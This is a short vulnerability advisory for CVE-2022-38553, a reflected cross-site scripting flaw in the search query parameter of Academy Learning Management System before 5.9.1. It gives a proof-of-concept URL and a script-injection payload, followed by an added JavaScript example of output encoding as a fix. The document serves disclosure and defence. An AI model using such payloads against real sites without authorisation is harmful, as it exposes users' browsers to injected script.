CROSS SITE SCRIPTING (XSS) ON "ACADEMY LEARNING MANAGEMENT SYSTEM" < v5.9.1 - PROOF OF CONCEPT (POC) CVE-2022-38553
Exploit Title: ACADEMY LEARNING MANAGEMENT SYSTEM < v5.9.1 - Cross Site Scripting (XSS)
CVE ID: CVE-2022-38553
Exploit Author: 4websecurity
Author's webpage: https://4websecurity.com
Date: 16-08-2022
Vendor Homepage: https://creativeitem.com
Version: up to 5.9.1
Vendor Demo page: https://demo.creativeitem.com/academy/home/
References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38553
https://www.openbugbounty.org/reports/2849933/
https://cve.report/CVE-2022-38553
https://nvd.nist.gov/vuln/detail/CVE-2022-38553
https://youtu.be/yFiZffHoeKs
Vulnerability field:
- Search parameter (search?query)
Cross-site scripting (XSS) vulnerability in ACADEMY LEARNING MANAGEMENT SYSTEM <5.9.1 allows remote attackers to inject arbitrary web script or HTML via the search?query parameter.
Proof Of Concept (POC):
https://example.com/search?query=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
Payload:
"><script>alert("XSS")</script>
Security Risk:
This vulnerability allows an attacker to execute arbitrary JavaScript code in a user's browser if the user opens a URL prepared by the attacker.
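Mitigation example (added here; not code from Academy LMS or from the advisory's author): HTML-encoding the search term at the point of output keeps the payload above inert. It assumes, based on the payload's leading `">`, that the value is reflected inside a double-quoted attribute; the template and all function names are hypothetical.

```javascript
// Added example: not code from Academy LMS. The template below is a
// hypothetical stand-in for a search page that echoes ?query= into an attribute.

// Encode the five characters that are significant in HTML text and
// quoted-attribute contexts. "&" must be replaced first.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Read the search term the way a server would: URLSearchParams percent-decodes it.
function searchTerm(url) {
  return new URL(url).searchParams.get("query") ?? "";
}

// Vulnerable pattern (assumed): raw value concatenated into the markup.
function renderUnsafe(url) {
  return `<input type="text" name="query" value="${searchTerm(url)}">`;
}

// Hardened pattern: same markup, value encoded at the point of output.
function renderSafe(url) {
  return `<input type="text" name="query" value="${escapeHtml(searchTerm(url))}">`;
}

// True when the rendered markup contains an opening script tag.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// The PoC URL from the advisory (example.com placeholder host).
const POC_URL =
  "https://example.com/search?query=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E";

console.log("unsafe:", renderUnsafe(POC_URL));
console.log("safe:  ", renderSafe(POC_URL));
```

The encoding shown covers HTML text and quoted-attribute contexts only; values written into inline JavaScript, URLs or CSS need the encoder for that context.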